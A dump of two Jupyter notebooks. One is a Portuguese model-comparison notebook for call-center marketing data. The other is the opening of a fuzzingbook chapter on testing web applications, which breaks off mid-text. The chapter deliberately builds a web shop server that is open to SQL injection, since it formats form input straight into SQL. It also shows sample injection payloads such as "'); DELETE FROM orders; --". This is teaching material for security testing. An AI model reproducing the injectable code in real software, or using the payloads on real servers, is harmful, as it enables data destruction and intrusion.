null
null
notebooks/3-modelagem.ipynb
Srekin/Auto_Insurance
778a6d125f5d37f975c0fc0d5051bf8a98fe56a1
[ "MIT" ]
null
null
null
notebooks/3-modelagem.ipynb
Srekin/Auto_Insurance
778a6d125f5d37f975c0fc0d5051bf8a98fe56a1
[ "MIT" ]
null
null
null
25.941969
154
0.524766
[ [ [ "# Teste Técnico para Ciência de Dados da Keyrus", "_____no_output_____" ], [ "## 1ª parte: Análise Exploratória\n\n- [x] Tipos de variáveis\n- [x] Medidas de posição\n- [x] Medidas de dispersão\n- [x] Tratamento de Missing Values\n- [x] Gráficos\n- [x] Análise de Outliers\n\n## 2ª parte: Estatística\n\n- [x] Estatística descritiva\n- [x] Identificação das distribuições das variáveis\n\n## 3ª parte: Modelagem\n\n- [x] Modelos de previsão\n- [x] Escolha de melhor modelo\n- [x] Avaliação de resultados\n- [x] Métricas", "_____no_output_____" ], [ "## Imports", "_____no_output_____" ] ], [ [ "# Data analysis and data wrangling\nimport numpy as np\nimport pandas as pd\n\n# Plotting\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport missingno as msno # missing values\n\n# Preprocessing\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.preprocessing import PolynomialFeatures\n\n# Machine Learning\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.linear_model import Ridge\n\n# Metrics\nfrom sklearn.model_selection import KFold\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.model_selection import cross_val_score\n\n# Other\nfrom IPython.display import Image\nimport configparser\nimport warnings\nimport os\nimport time\nimport pprint", "_____no_output_____" ] ], [ [ "## Preparação do Diretório Principal", "_____no_output_____" ] ], [ [ "def prepare_directory_work(end_directory: str='notebooks'):\n # Current path\n curr_dir = os.path.dirname (os.path.realpath (\"__file__\")) \n \n if curr_dir.endswith(end_directory):\n os.chdir('..')\n return curr_dir\n \n return f'Current working directory: {curr_dir}'", "_____no_output_____" ], [ "prepare_directory_work(end_directory='notebooks')", "_____no_output_____" ] ], [ [ "## Cell Format", "_____no_output_____" ] ], [ [ "config = configparser.ConfigParser()\nconfig.read('src/visualization/plot_config.ini')\n\nfigure_titlesize = config['figure']['figure_titlesize']\nfigure_figsize_large = int(config['figure']['figure_figsize_large'])\nfigure_figsize_width = int(config['figure']['figure_figsize_width'])\nfigure_dpi = int(config['figure']['figure_dpi'])\nfigure_facecolor = config['figure']['figure_facecolor']\nfigure_autolayout = bool(config['figure']['figure_autolayout'])\n\nfont_family = config['font']['font_family']\nfont_size = int(config['font']['font_size'])\n\nlegend_loc = config['legend']['legend_loc']\nlegend_fontsize = int(config['legend']['legend_fontsize'])", "_____no_output_____" ], [ "# Customizing file matplotlibrc\n\n# Figure\nplt.rcParams['figure.titlesize'] = figure_titlesize\nplt.rcParams['figure.figsize'] = [figure_figsize_large, figure_figsize_width] \nplt.rcParams['figure.dpi'] = figure_dpi\nplt.rcParams['figure.facecolor'] = figure_facecolor\nplt.rcParams['figure.autolayout'] = figure_autolayout\n\n# Font\nplt.rcParams['font.family'] = font_family\nplt.rcParams['font.size'] = font_size\n\n# Legend\nplt.rcParams['legend.loc'] = legend_loc\nplt.rcParams['legend.fontsize'] = legend_fontsize", "_____no_output_____" ], [ "# Guarantees visualization inside the jupyter\n%matplotlib inline\n\n# Load the \"autoreload\" extension so that code can change\n%load_ext autoreload\n\n# Format the data os all table (float_format 3)\npd.set_option('display.float_format', '{:.6}'.format)\n\n# Print xxxx rows and columns\npd.set_option('display.max_rows', None)\npd.set_option('display.max_columns', None)\n\n# Supress unnecessary warnings so that presentation looks clean\nwarnings.filterwarnings('ignore')", "_____no_output_____" ] ], [ [ "## Carregamento dos Dados", "_____no_output_____" ] ], [ [ "%%time\n\ndf_callcenter = pd.read_csv('data/cleansing/callcenter_marketing_clenning.csv', \n encoding='utf8',\n delimiter=',',\n verbose=True)", "Tokenization took: 31.08 ms\nType conversion took: 33.04 ms\nParser memory cleanup took: 0.01 ms\nCPU times: user 83 ms, sys: 9.45 ms, total: 92.5 ms\nWall time: 92.8 ms\n" ], [ "df_callcenter.info()", "<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 41167 entries, 0 to 41166\nData columns (total 15 columns):\nidade 41167 non-null int64\nprofissao 41167 non-null int64\neducacao 41167 non-null int64\nmeio_contato 41167 non-null int64\nmes 41167 non-null int64\ndia_da_semana 41167 non-null int64\nduracao 41167 non-null int64\ndias_ultimo_contato 41167 non-null int64\nqtd_contatos_total 41167 non-null int64\ncampanha_anterior 41167 non-null int64\nindice_precos_consumidor 41167 non-null float64\nindice_confianca_consumidor 41167 non-null float64\neuribor3m 41167 non-null float64\nnumero_empregados 41167 non-null int64\nresultado 41167 non-null int64\ndtypes: float64(3), int64(12)\nmemory usage: 4.7 MB\n" ] ], [ [ "OBS: carragamento em quase metade do tempo em realação a versão original do arquivo csv.", "_____no_output_____" ], [ "---\n\n## Variáveis Globais", "_____no_output_____" ] ], [ [ "# Lists that will be manipulated in the data processing\nlist_columns = []\nlist_categorical_col = []\nlist_numerical_col = []\nlist_without_target_col = []", "_____no_output_____" ], [ "def get_col(df: 'dataframe' = None,\n type_descr: 'numpy' = np.number) -> list:\n \"\"\"\n Function get list columns \n \n Args:\n type_descr\n np.number, np.object -> return list with all columns\n np.number -> return list numerical columns \n np.object -> return list object columns\n \"\"\"\n try:\n col = (df.describe(include=type_descr).columns) # pandas.core.indexes.base.Index \n except ValueError:\n print(f'Dataframe not contains {type_descr} columns !', end='\\n') \n else:\n return col.tolist() ", "_____no_output_____" ], [ "def get_col_without_target(df: 'dataframe',\n list_columns: list,\n target_col: str) -> list:\n\n col_target = list_columns.copy()\n \n col_target.remove(target_col)\n print(type(col_target))\n \n \n return col_target", "_____no_output_____" ], [ "list_numerical_col = get_col(df=df_callcenter,\n type_descr=np.number)\nlist_categorical_col = get_col(df=df_callcenter,\n type_descr=np.object)\nlist_columns = get_col(df=df_callcenter,\n type_descr=[np.object, np.number])\nlist_without_target_col = get_col_without_target(df=df_callcenter,\n list_columns=list_columns,\n target_col='resultado')", "Dataframe not contains <class 'object'> columns !\n<class 'list'>\n" ] ], [ [ "## Training and Testing Dataset\n- métrica: cross score", "_____no_output_____" ] ], [ [ "def cross_val_model(X,y, model, n_splits=3):\n 'Do split dataset and calculate cross_score'\n print(\"Begin training\", end='\\n\\n')\n start = time.time()\n \n X = np.array(X)\n y = np.array(y)\n folds = list(StratifiedKFold(n_splits=n_splits, shuffle=True, random_state=2017).split(X, y))\n\n for j, (train_idx, test_idx) in enumerate(folds):\n X_train = X[train_idx]\n y_train = y[train_idx]\n X_holdout = X[test_idx]\n y_holdout = y[test_idx]\n\n print (\"Fit %s fold %d\" % (str(model).split('(')[0], j+1))\n model.fit(X_train, y_train)\n cross_score = cross_val_score(model, X_holdout, y_holdout, cv=3, scoring='roc_auc')\n print(\"\\tcross_score: %.5f\" % cross_score.mean())\n \n end = time.time()\n print(\"\\nTraining done! Time Elapsed:\", end - start, \" seconds.\")", "_____no_output_____" ], [ "# training model\n\nX = df_callcenter[list_without_target_col]\ny = df_callcenter['resultado'] # target", "_____no_output_____" ] ], [ [ "---\n\n## Modelos de Previsão\n- Modelo Baseline\n- Benckmarks", "_____no_output_____" ], [ "### Modelo Baseline\n- Vou começar com um baseline, sendo o mais simples possível.", "_____no_output_____" ], [ "#### Linear Regression", "_____no_output_____" ] ], [ [ "# training model\nX = df_callcenter[list_without_target_col]\ny = df_callcenter['resultado']\n\nprint(X.shape)\nprint(y.shape)", "(41167, 14)\n(41167,)\n" ], [ "# Visualize params\n\nLinearRegression(n_jobs=-1)", "_____no_output_____" ], [ "# create model\nlr_model = LinearRegression(n_jobs=-1, normalize=False)", "_____no_output_____" ], [ "# split dataset and calculate cross_score\ncross_val_model(X, y, lr_model)", "Begin training\n\nFit LinearRegression fold 1\n\tcross_score: 0.81122\nFit LinearRegression fold 2\n\tcross_score: 0.82172\nFit LinearRegression fold 3\n\tcross_score: 0.82711\n\nTraining done! Time Elapsed: 0.32276058197021484 seconds.\n" ] ], [ [ "#### Linear Regression with Regularization", "_____no_output_____" ] ], [ [ "# create model\nlr_ridge_model = Ridge()", "_____no_output_____" ], [ "# split dataset and calculate cross_score\ncross_val_model(X, y, lr_ridge_model)", "Begin training\n\nFit Ridge fold 1\n\tcross_score: 0.81217\nFit Ridge fold 2\n\tcross_score: 0.82215\nFit Ridge fold 3\n\tcross_score: 0.82968\n\nTraining done! Time Elapsed: 0.17592835426330566 seconds.\n" ] ], [ [ "#### Polynomial Regression", "_____no_output_____" ] ], [ [ "poly = PolynomialFeatures(degree=2)\n\nX_poly = poly.fit_transform(X)\nprint(X_poly.shape)", "(41167, 120)\n" ], [ "# split dataset and calculate cross_score\ncross_val_model(X_poly, y, lr_model)", "Begin training\n\nFit LinearRegression fold 1\n\tcross_score: 0.80062\nFit LinearRegression fold 2\n\tcross_score: 0.75551\nFit LinearRegression fold 3\n\tcross_score: 0.56845\n\nTraining done! Time Elapsed: 4.029158353805542 seconds.\n" ] ], [ [ "### Benckmarks", "_____no_output_____" ], [ "#### RandomForest", "_____no_output_____" ] ], [ [ "# Visualize params\n\nRandomForestClassifier()", "_____no_output_____" ], [ "# RandomForest params dict\nrf_params_one = {}\n\nrf_params_one['n_estimators'] = 10\nrf_params_one['max_depth'] = 10\nrf_params_one['min_samples_split'] = 10\nrf_params_one['min_samples_leaf'] = 10 # end tree necessary 30 leaf\nrf_params_one['n_jobs'] = -1 # run all process", "_____no_output_____" ], [ "# create model\nrf_model_one = RandomForestClassifier(**rf_params_one)\n\n# training model\nX = df_callcenter[list_without_target_col]\ny = df_callcenter['resultado']", "_____no_output_____" ], [ "# split dataset and calculate cross_score\ncross_val_model(X, y, rf_model_one)", "Begin training\n\nFit RandomForestClassifier fold 1\n\tcross_score: 0.20105\nFit RandomForestClassifier fold 2\n\tcross_score: 0.29913\nFit RandomForestClassifier fold 3\n\tcross_score: 0.21718\n\nTraining done! Time Elapsed: 2.6957101821899414 seconds.\n" ], [ "# RandomForest params dict\nrf_params_two = {}\n\nrf_params_two['n_estimators'] = 1\nrf_params_two['max_depth'] = len(list_numerical_col)*2\nrf_params_two['min_samples_split'] = len(list_numerical_col)\nrf_params_two['min_samples_leaf'] = len(list_numerical_col)\nrf_params_two['n_jobs'] = -1 # run all process", "_____no_output_____" ], [ "# create model\nrf_model = RandomForestClassifier(**rf_params_two, criterion='entropy')\n\n# training model\nX = df_callcenter[list_without_target_col]\ny = df_callcenter['resultado']", "_____no_output_____" ], [ "# split dataset and calculate cross_score\ncross_val_model(X, y, rf_model)", "Begin training\n\nFit RandomForestClassifier fold 1\n\tcross_score: 0.30151\nFit RandomForestClassifier fold 2\n\tcross_score: 0.46162\nFit RandomForestClassifier fold 3\n\tcross_score: 0.28610\n\nTraining done! Time Elapsed: 0.47094202041625977 seconds.\n" ] ], [ [ "#### Random Forest Regressor", "_____no_output_____" ] ], [ [ "# Visualize params\n\nRandomForestRegressor()", "_____no_output_____" ], [ "# 1st model Random Forest\nrf_regressor_one = RandomForestRegressor(n_jobs = -1,\n verbose = 0)", "_____no_output_____" ], [ "# split dataset and calculate cross_score\ncross_val_model(X, y, rf_regressor_one)", "Begin training\n\nFit RandomForestRegressor fold 1\n\tcross_score: 0.70972\nFit RandomForestRegressor fold 2\n\tcross_score: 0.75071\nFit RandomForestRegressor fold 3\n\tcross_score: 0.75449\n\nTraining done! Time Elapsed: 2.0970282554626465 seconds.\n" ], [ "# 2st model Random Forest\nrf_regressor_two = RandomForestRegressor(n_estimators = 1000,\n max_leaf_nodes = len(list_numerical_col)*8,\n min_samples_leaf = len(list_numerical_col),\n max_depth = len(list_numerical_col)*4,\n n_jobs = -1,\n verbose = 0)", "_____no_output_____" ], [ "# split dataset and calculate cross_score\ncross_val_model(X, y, rf_regressor_two)", "Begin training\n\nFit RandomForestRegressor fold 1\n\tcross_score: 0.77778\nFit RandomForestRegressor fold 2\n\tcross_score: 0.82433\nFit RandomForestRegressor fold 3\n\tcross_score: 0.84885\n\nTraining done! Time Elapsed: 37.298661947250366 seconds.\n" ] ], [ [ "---\n\n## Escolha do Melhor Modelo\n\nBaseado no cross_score o modelo escolhido será **random forest regressor** com os parâmetros do 2º modelo, que obteve um score > 0.84.", "_____no_output_____" ], [ "---\n\n#### Copyright\n\n<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-sa/4.0/\">\n <img alt=\"Creative Commons License\" align=\"right\" style=\"border-width:0\" src=\"https://i.creativecommons.org/l/by-sa/4.0/88x31.png\" />\n</a>", "_____no_output_____" ], [ "This work by Bruno A. R. M. Campos is licensed under a [Creative Commons license](http://creativecommons.org/licenses/by-sa/4.0/).", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown", "markdown", "markdown" ] ]
cb1df5d8eb9fa909308eca7ca9c0e513d9e10fe8
319,034
ipynb
Jupyter Notebook
docs/notebooks/WebFuzzer.ipynb
vrthra-forks/fuzzingbook
15319dcd7c213559cfe992c2e5936dab52929658
[ "MIT" ]
null
null
null
docs/notebooks/WebFuzzer.ipynb
vrthra-forks/fuzzingbook
15319dcd7c213559cfe992c2e5936dab52929658
[ "MIT" ]
null
null
null
docs/notebooks/WebFuzzer.ipynb
vrthra-forks/fuzzingbook
15319dcd7c213559cfe992c2e5936dab52929658
[ "MIT" ]
null
null
null
31.394804
1,759
0.540726
[ [ [ "# Testing Web Applications\n\nIn this chapter, we explore how to generate tests for Graphical User Interfaces (GUIs), notably on Web interfaces. We set up a (vulnerable) Web server and demonstrate how to systematically explore its behavior – first with hand-written grammars, then with grammars automatically inferred from the user interface. We also show how to conduct systematic attacks on these servers, notably with code and SQL injection.", "_____no_output_____" ] ], [ [ "from bookutils import YouTubeVideo\nYouTubeVideo('5agY5kg8Pvk')", "_____no_output_____" ] ], [ [ "**Prerequisites**\n\n* The techniques in this chapter make use of [grammars for fuzzing](Grammars.ipynb).\n* Basic knowledge of HTML and HTTP is required.\n* Knowledge of SQL databases is helpful.", "_____no_output_____" ], [ "## Synopsis\n<!-- Automatically generated. Do not edit. -->\n\nTo [use the code provided in this chapter](Importing.ipynb), write\n\n```python\n>>> from fuzzingbook.WebFuzzer import <identifier>\n```\n\nand then make use of the following features.\n\n\nThis chapter provides a simple (and vulnerable) Web server and two experimental fuzzers that are applied to it.\n\n### Fuzzing Web Forms\n\n`WebFormFuzzer` demonstrates how to interact with a Web form. Given a URL with a Web form, it automatically extracts a grammar that produces a URL; this URL contains values for all form elements. Support is limited to GET forms and a subset of HTML form elements.\n\nHere's the grammar extracted for our vulnerable Web server:\n\n```python\n>>> web_form_fuzzer = WebFormFuzzer(httpd_url)\n>>> web_form_fuzzer.grammar['<start>']\n['<action>?<query>']\n>>> web_form_fuzzer.grammar['<action>']\n['/order']\n>>> web_form_fuzzer.grammar['<query>']\n['<item>&<name>&<email-1>&<city>&<zip>&<terms>&<submit-1>']\n```\nUsing it for fuzzing yields a path with all form values filled; accessing this path acts like filling out and submitting the form.\n\n```python\n>>> web_form_fuzzer.fuzz()\n'/order?item=lockset&name=%43+&email=+c%40_+c&city=%37b_4&zip=5&terms=on&submit='\n```\nRepeated calls to `WebFormFuzzer.fuzz()` invoke the form again and again, each time with different (fuzzed) values.\n\nInternally, `WebFormFuzzer` builds on a helper class named `HTMLGrammarMiner`; you can extend its functionality to include more features.\n\n### SQL Injection Attacks\n\n`SQLInjectionFuzzer` is an experimental extension of `WebFormFuzzer` whose constructor takes an additional _payload_ – an SQL command to be injected and executed on the server. Otherwise, it is used like `WebFormFuzzer`:\n\n```python\n>>> sql_fuzzer = SQLInjectionFuzzer(httpd_url, \"DELETE FROM orders\")\n>>> sql_fuzzer.fuzz()\n\"/order?item=lockset&name=+&email=0%404&city=+'+)%3b+DELETE+FROM+orders%3b+--&zip='+OR+1%3d1--'&terms=on&submit=\"\n```\nAs you can see, the path to be retrieved contains the payload encoded into one of the form field values.\n\nInternally, `SQLInjectionFuzzer` builds on a helper class named `SQLInjectionGrammarMiner`; you can extend its functionality to include more features.\n\n`SQLInjectionFuzzer` is a proof-of-concept on how to build a malicious fuzzer; you should study and extend its code to make actual use of it.\n\n![](PICS/WebFuzzer-synopsis-1.svg)\n\n", "_____no_output_____" ], [ "## A Web User Interface\n\nLet us start with a simple example. We want to set up a _Web server_ that allows readers of this book to buy fuzzingbook-branded fan articles (\"swag\"). In reality, we would make use of an existing Web shop (or an appropriate framework) for this purpose. For the purpose of this book, we _write our own Web server_, building on the HTTP server facilities provided by the Python library.", "_____no_output_____" ], [ "### Excursion: Implementing a Web Server", "_____no_output_____" ], [ "All of our Web server is defined in a `HTTPRequestHandler`, which, as the name suggests, handles arbitrary Web page requests.", "_____no_output_____" ] ], [ [ "from http.server import HTTPServer, BaseHTTPRequestHandler\nfrom http.server import HTTPStatus # type: ignore", "_____no_output_____" ], [ "class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):\n \"\"\"A simple HTTP server\"\"\"\n pass", "_____no_output_____" ] ], [ [ "#### Taking Orders\n\nFor our Web server, we need a number of Web pages:\n* We want one page where customers can place an order.\n* We want one page where they see their order confirmed. \n* Additionally, we need pages display error messages such as \"Page Not Found\".", "_____no_output_____" ], [ "We start with the order form. The dictionary `FUZZINGBOOK_SWAG` holds the items that customers can order, together with long descriptions:", "_____no_output_____" ] ], [ [ "import bookutils", "_____no_output_____" ], [ "from typing import NoReturn, Tuple, Dict, List, Optional, Union", "_____no_output_____" ], [ "FUZZINGBOOK_SWAG = {\n \"tshirt\": \"One FuzzingBook T-Shirt\",\n \"drill\": \"One FuzzingBook Rotary Hammer\",\n \"lockset\": \"One FuzzingBook Lock Set\"\n}", "_____no_output_____" ] ], [ [ "This is the HTML code for the order form. The menu for selecting the swag to be ordered is created dynamically from `FUZZINGBOOK_SWAG`. We omit plenty of details such as precise shipping address, payment, shopping cart, and more.", "_____no_output_____" ] ], [ [ "HTML_ORDER_FORM = \"\"\"\n<html><body>\n<form action=\"/order\" style=\"border:3px; border-style:solid; border-color:#FF0000; padding: 1em;\">\n <strong id=\"title\" style=\"font-size: x-large\">Fuzzingbook Swag Order Form</strong>\n <p>\n Yes! Please send me at your earliest convenience\n <select name=\"item\">\n \"\"\"\n# (We don't use h2, h3, etc. here\n# as they interfere with the notebook table of contents)\n\n\nfor item in FUZZINGBOOK_SWAG:\n HTML_ORDER_FORM += \\\n '<option value=\"{item}\">{name}</option>\\n'.format(item=item,\n name=FUZZINGBOOK_SWAG[item])\n\nHTML_ORDER_FORM += \"\"\"\n </select>\n <br>\n <table>\n <tr><td>\n <label for=\"name\">Name: </label><input type=\"text\" name=\"name\">\n </td><td>\n <label for=\"email\">Email: </label><input type=\"email\" name=\"email\"><br>\n </td></tr>\n <tr><td>\n <label for=\"city\">City: </label><input type=\"text\" name=\"city\">\n </td><td>\n <label for=\"zip\">ZIP Code: </label><input type=\"number\" name=\"zip\">\n </tr></tr>\n </table>\n <input type=\"checkbox\" name=\"terms\"><label for=\"terms\">I have read\n the <a href=\"/terms\">terms and conditions</a></label>.<br>\n <input type=\"submit\" name=\"submit\" value=\"Place order\">\n</p>\n</form>\n</body></html>\n\"\"\"", "_____no_output_____" ] ], [ [ "This is what the order form looks like:", "_____no_output_____" ] ], [ [ "from IPython.display import display", "_____no_output_____" ], [ "from bookutils import HTML", "_____no_output_____" ], [ "HTML(HTML_ORDER_FORM)", "_____no_output_____" ] ], [ [ "This form is not yet functional, as there is no server behind it; pressing \"place order\" will lead you to a nonexistent page.", "_____no_output_____" ], [ "#### Order Confirmation\n\nOnce we have gotten an order, we show a confirmation page, which is instantiated with the customer information submitted before. Here is the HTML and the rendering:", "_____no_output_____" ] ], [ [ "HTML_ORDER_RECEIVED = \"\"\"\n<html><body>\n<div style=\"border:3px; border-style:solid; border-color:#FF0000; padding: 1em;\">\n <strong id=\"title\" style=\"font-size: x-large\">Thank you for your Fuzzingbook Order!</strong>\n <p id=\"confirmation\">\n We will send <strong>{item_name}</strong> to {name} in {city}, {zip}<br>\n A confirmation mail will be sent to {email}.\n </p>\n <p>\n Want more swag? Use our <a href=\"/\">order form</a>!\n </p>\n</div>\n</body></html>\n\"\"\"", "_____no_output_____" ], [ "HTML(HTML_ORDER_RECEIVED.format(item_name=\"One FuzzingBook Rotary Hammer\",\n name=\"Jane Doe\",\n email=\"[email protected]\",\n city=\"Seattle\",\n zip=\"98104\"))", "_____no_output_____" ] ], [ [ "#### Terms and Conditions\n\nA Web site can only be complete if it has the necessary legalese. This page shows some terms and conditions.", "_____no_output_____" ] ], [ [ "HTML_TERMS_AND_CONDITIONS = \"\"\"\n<html><body>\n<div style=\"border:3px; border-style:solid; border-color:#FF0000; padding: 1em;\">\n <strong id=\"title\" style=\"font-size: x-large\">Fuzzingbook Terms and Conditions</strong>\n <p>\n The content of this project is licensed under the\n <a href=\"https://creativecommons.org/licenses/by-nc-sa/4.0/\">Creative Commons\n Attribution-NonCommercial-ShareAlike 4.0 International License.</a>\n </p>\n <p>\n To place an order, use our <a href=\"/\">order form</a>.\n </p>\n</div>\n</body></html>\n\"\"\"", "_____no_output_____" ], [ "HTML(HTML_TERMS_AND_CONDITIONS)", "_____no_output_____" ] ], [ [ "#### Storing Orders", "_____no_output_____" ], [ "To store orders, we make use of a *database*, stored in the file `orders.db`.", "_____no_output_____" ] ], [ [ "import sqlite3\nimport os", "_____no_output_____" ], [ "ORDERS_DB = \"orders.db\"", "_____no_output_____" ] ], [ [ "To interact with the database, we use *SQL commands*. The following commands create a table with five text columns for item, name, email, city, and zip – the exact same fields we also use in our HTML form.", "_____no_output_____" ] ], [ [ "def init_db():\n if os.path.exists(ORDERS_DB):\n os.remove(ORDERS_DB)\n\n db_connection = sqlite3.connect(ORDERS_DB)\n db_connection.execute(\"DROP TABLE IF EXISTS orders\")\n db_connection.execute(\"CREATE TABLE orders \"\n \"(item text, name text, email text, \"\n \"city text, zip text)\")\n db_connection.commit()\n\n return db_connection", "_____no_output_____" ], [ "db = init_db()", "_____no_output_____" ] ], [ [ "At this point, the database is still empty:", "_____no_output_____" ] ], [ [ "print(db.execute(\"SELECT * FROM orders\").fetchall())", "[]\n" ] ], [ [ "We can add entries using the SQL `INSERT` command:", "_____no_output_____" ] ], [ [ "db.execute(\"INSERT INTO orders \" +\n \"VALUES ('lockset', 'Walter White', \"\n \"'[email protected]', 'Albuquerque', '87101')\")\ndb.commit()", "_____no_output_____" ] ], [ [ "These values are now in the database:", "_____no_output_____" ] ], [ [ "print(db.execute(\"SELECT * FROM orders\").fetchall())", "[('lockset', 'Walter White', '[email protected]', 'Albuquerque', '87101')]\n" ] ], [ [ "We can also delete entries from the table again (say, after completion of the order):", "_____no_output_____" ] ], [ [ "db.execute(\"DELETE FROM orders WHERE name = 'Walter White'\")\ndb.commit()", "_____no_output_____" ], [ "print(db.execute(\"SELECT * FROM orders\").fetchall())", "[]\n" ] ], [ [ "#### Handling HTTP Requests\n\nWe have an order form and a database; now we need a Web server which brings it all together. The Python `http.server` module provides everything we need to build a simple HTTP server. A `HTTPRequestHandler` is an object that takes and processes HTTP requests – in particular, `GET` requests for retrieving Web pages.", "_____no_output_____" ], [ "We implement the `do_GET()` method that, based on the given path, branches off to serve the requested Web pages. Requesting the path `/` produces the order form; a path beginning with `/order` sends an order to be processed. All other requests end in a `Page Not Found` message.", "_____no_output_____" ] ], [ [ "class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):\n def do_GET(self):\n try:\n # print(\"GET \" + self.path)\n if self.path == \"/\":\n self.send_order_form()\n elif self.path.startswith(\"/order\"):\n self.handle_order()\n elif self.path.startswith(\"/terms\"):\n self.send_terms_and_conditions()\n else:\n self.not_found()\n except Exception:\n self.internal_server_error()", "_____no_output_____" ] ], [ [ "##### Order Form\n\nAccessing the home page (i.e. getting the page at `/`) is simple: We go and serve the `html_order_form` as defined above.", "_____no_output_____" ] ], [ [ "class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):\n def send_order_form(self):\n self.send_response(HTTPStatus.OK, \"Place your order\")\n self.send_header(\"Content-type\", \"text/html\")\n self.end_headers()\n self.wfile.write(HTML_ORDER_FORM.encode(\"utf8\"))", "_____no_output_____" ] ], [ [ "Likewise, we can send out the terms and conditions:", "_____no_output_____" ] ], [ [ "class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):\n def send_terms_and_conditions(self):\n self.send_response(HTTPStatus.OK, \"Terms and Conditions\")\n self.send_header(\"Content-type\", \"text/html\")\n self.end_headers()\n self.wfile.write(HTML_TERMS_AND_CONDITIONS.encode(\"utf8\"))", "_____no_output_____" ] ], [ [ "##### Processing Orders", "_____no_output_____" ], [ "When the user clicks `Submit` on the order form, the Web browser creates and retrieves a URL of the form\n\n```\n<hostname>/order?field_1=value_1&field_2=value_2&field_3=value_3\n```\n\nwhere each `field_i` is the name of the field in the HTML form, and `value_i` is the value provided by the user. Values use the CGI encoding we have seen in the [chapter on coverage](Coverage.ipynb) – that is, spaces are converted into `+`, and characters that are not digits or letters are converted into `%nn`, where `nn` is the hexadecimal value of the character.\n\nIf Jane Doe <[email protected]> from Seattle orders a T-Shirt, this is the URL the browser creates:\n\n```\n<hostname>/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104\n```", "_____no_output_____" ], [ "When processing a query, the attribute `self.path` of the HTTP request handler holds the path accessed – i.e., everything after `<hostname>`. The helper method `get_field_values()` takes `self.path` and returns a dictionary of values.", "_____no_output_____" ] ], [ [ "import urllib.parse", "_____no_output_____" ], [ "class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):\n def get_field_values(self):\n # Note: this fails to decode non-ASCII characters properly\n query_string = urllib.parse.urlparse(self.path).query\n\n # fields is { 'item': ['tshirt'], 'name': ['Jane Doe'], ...}\n fields = urllib.parse.parse_qs(query_string, keep_blank_values=True)\n\n values = {}\n for key in fields:\n values[key] = fields[key][0]\n\n return values", "_____no_output_____" ] ], [ [ "The method `handle_order()` takes these values from the URL, stores the order, and returns a page confirming the order. If anything goes wrong, it sends an internal server error.", "_____no_output_____" ] ], [ [ "class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):\n def handle_order(self):\n values = self.get_field_values()\n self.store_order(values)\n self.send_order_received(values)", "_____no_output_____" ] ], [ [ "Storing the order makes use of the database connection defined above; we create an SQL command instantiated with the values as extracted from the URL.", "_____no_output_____" ] ], [ [ "class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):\n def store_order(self, values):\n db = sqlite3.connect(ORDERS_DB)\n # The following should be one line\n sql_command = \"INSERT INTO orders VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')\".format(**values)\n self.log_message(\"%s\", sql_command)\n db.executescript(sql_command)\n db.commit()", "_____no_output_____" ] ], [ [ "After storing the order, we send the confirmation HTML page, which again is instantiated with the values from the URL.", "_____no_output_____" ] ], [ [ "class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):\n def send_order_received(self, values):\n # Should use html.escape()\n values[\"item_name\"] = FUZZINGBOOK_SWAG[values[\"item\"]]\n confirmation = HTML_ORDER_RECEIVED.format(**values).encode(\"utf8\")\n\n self.send_response(HTTPStatus.OK, \"Order received\")\n self.send_header(\"Content-type\", \"text/html\")\n self.end_headers()\n self.wfile.write(confirmation)", "_____no_output_____" ] ], [ [ "##### Other HTTP commands\n\nBesides the `GET` command (which does all the heavy lifting), HTTP servers can also support other HTTP commands; we support the `HEAD` command, which returns the head information of a Web page. In our case, this is always empty.", "_____no_output_____" ] ], [ [ "class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):\n def do_HEAD(self):\n # print(\"HEAD \" + self.path)\n self.send_response(HTTPStatus.OK)\n self.send_header(\"Content-type\", \"text/html\")\n self.end_headers()", "_____no_output_____" ] ], [ [ "#### Error Handling\n\nWe have defined pages for submitting and processing orders; now we also need a few pages for errors that might occur.", "_____no_output_____" ], [ "##### Page Not Found\n\nThis page is displayed if a non-existing page (i.e. anything except `/` or `/order`) is requested.", "_____no_output_____" ] ], [ [ "HTML_NOT_FOUND = \"\"\"\n<html><body>\n<div style=\"border:3px; border-style:solid; border-color:#FF0000; padding: 1em;\">\n <strong id=\"title\" style=\"font-size: x-large\">Sorry.</strong>\n <p>\n This page does not exist. Try our <a href=\"/\">order form</a> instead.\n </p>\n</div>\n</body></html>\n \"\"\"", "_____no_output_____" ], [ "HTML(HTML_NOT_FOUND)", "_____no_output_____" ] ], [ [ "The method `not_found()` takes care of sending this out with the appropriate HTTP status code.", "_____no_output_____" ] ], [ [ "class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):\n def not_found(self):\n self.send_response(HTTPStatus.NOT_FOUND, \"Not found\")\n\n self.send_header(\"Content-type\", \"text/html\")\n self.end_headers()\n\n message = HTML_NOT_FOUND\n self.wfile.write(message.encode(\"utf8\"))", "_____no_output_____" ] ], [ [ "##### Internal Errors\n\nThis page is shown 